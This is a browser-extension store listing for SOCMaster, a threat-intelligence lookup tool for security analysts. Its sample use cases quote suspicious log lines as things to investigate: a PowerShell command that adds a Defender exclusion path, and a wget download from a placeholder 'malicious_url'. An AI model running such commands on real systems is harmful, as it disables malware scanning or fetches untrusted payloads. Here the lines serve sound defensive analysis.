SOCMaster

Featured

5.0 (2 ratings)

Extension, Tools, 170 users

Overview

Get info on OS Commands, IPs, Domains, URLs, Hashes, Windows Events and Registry keys, Strings, and Files with one click.

SOCMaster is a powerful browser extension designed to enhance the efficiency and effectiveness of cybersecurity professionals. With a single click, users can scan IP addresses, domains, URLs, file hashes, and more directly from their browser, transforming raw data into actionable intelligence. Whether you're a threat hunter, SOC analyst, or incident responder, SOCMaster streamlines your workflow by integrating directly with leading threat intelligence platforms such as VirusTotal, AbuseIPDB, and others, so you can swiftly turn data into actionable insights.

==============================
USAGE
==============================

Single lookup

1. From the web browser, select or highlight an artifact and right-click.
2. Select "SOCMaster".
3. Click one of the available options.
4. A menu appears on the lower right side containing information on the artifact.

Bulk lookups

Bulk lookups let you quickly assess multiple artifacts at once, saving time during intensive investigations.

1. From the web browser, gather a list of IP addresses, domains, URLs, file hashes, or file names, with each entry separated by a new line or spaces. For example:

   8.8.8.8
   7.7.7.7
   6.6.6.6

2. Highlight all of the objects to be scanned, right-click, and select "SOCMaster".
3. Click one of the available options (IP/Domain/URL/Hash scan using vendor API keys, or Get file (Linux/Windows) information).
4. A menu appears on the lower right side containing information on each object. The reputation of each artifact from threat intel vendors is also shown.

==============================
MAIN FEATURES
==============================

1. IP/Domain/Hash scan using vendor API keys:
   - Uses threat intelligence vendors such as AbuseIPDB, VirusTotal, AlienVaultOTX, HybridAnalysis and others to obtain the reputation of, and information on, an IP address, domain, or hash. The data available depends on the vendor.
   - Requires an API key from the vendor.

2. URL scan using vendor API keys:
   - Submits URLs to URLscan.io, VirusTotal, AlienVault, HybridAnalysis and others for analysis using API keys.
   - Click the vendor link to view the URL scan result.
   - Requires an API key from the vendor.

3. Get OS command information (PowerShell, Windows, Linux, OSX):
   - Get information on over 3,300 PowerShell cmdlets from PowerShell modules, almost all Linux commands (man sections 1-8), Windows commands, and OSX commands.
   - Shows information on operating system binaries and commands. For example, Windows commands such as "ipconfig" or "tasklist", "Set-ExecutionPolicy" for PowerShell, and "rm" for Linux.
   - No API key required.

4. Get file (Linux/Windows) or Registry key (Windows) information:
   - Retrieve information on known files such as "kernel32.dll" for Windows or "passwd" for Linux.
   - Get information on Windows Registry keys such as "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce".
   - No API key required.

5. Get event ID information (Windows):
   - Shows documentation on a Windows Event Log entry using its Event ID.
   - No API key required.

6. String search (Twitter, Google):
   - Displays Twitter or Google search results for a string of characters.

==============================
API KEY CONFIGURATION
==============================

Querying an IP, domain, or hash through a vendor requires that vendor's API key. To add one:

1. Click the Extensions icon in Google Chrome's upper right menu.
2. Click the "SOCMaster" icon > Settings.
3. On the settings page, click "Add API key" in the upper right corner.
4. Under intel source selection, select the API key vendor.
5. Paste the vendor API key into the API key field.
6. Click save.
7. The API key is now added, and IP/Domain/Hash scan using vendor API keys can be used.

==============================
SAMPLE USE CASE
==============================

1. Suspicious PowerShell logs show:

   Set-MpPreference -ExclusionPath "C:\users\public\documents\sucmra"

   A user can highlight the above command, select the "Find command information" option, and view the syntax and parameters of the command.

2. Suspicious IP address from the firewall logs:

   x.x.x.x

   A user can highlight the IP, select the "IP scan using vendor API keys" option, and view the IP reputation and data from vendors.

3. Suspicious Linux command logs show:

   wget http://malicious_url -O

   A user can highlight the above command, select the "Find command information" option, and view the syntax and parameters of the command.

4. Windows Event IDs on the SIEM show:

   eventID 4624

   A user can highlight the event ID number, select the "Get event ID information" option, and view the fields and description of the Windows event.

==============================
CREDITS
==============================

Supports the following vendors:

- VirusTotal
- AbuseIPDB
- AlienVaultOTX
- Twitter
- URLscan
- HybridAnalysis
- GoogleSearch
- Pulsedive

Author contact: https://www.linkedin.com/in/marcusmcapistrano/

5 out of 5 (2 ratings)


Marinela Isabelle Capistrano, Feb 21, 2023

very useful tool for searching definitions

1 person found this review to be helpful

Details

  • Version
    0.5.9
  • Updated
    October 5, 2024
  • Offered by
    Marcus Capistrano
  • Size
    493KiB
  • Languages
    English
  • Developer
    Email
    marcuscapistrano69@gmail.com
  • Non-trader
    This developer has not identified itself as a trader. For consumers in the European Union, please note that consumer rights do not apply to contracts between you and this developer.

Privacy

The developer has disclosed that it will not collect or use your data. To learn more, see the developer’s privacy policy.

This developer declares that your data is

  • Not being sold to third parties, outside of the approved use cases
  • Not being used or transferred for purposes that are unrelated to the item's core functionality
  • Not being used or transferred to determine creditworthiness or for lending purposes
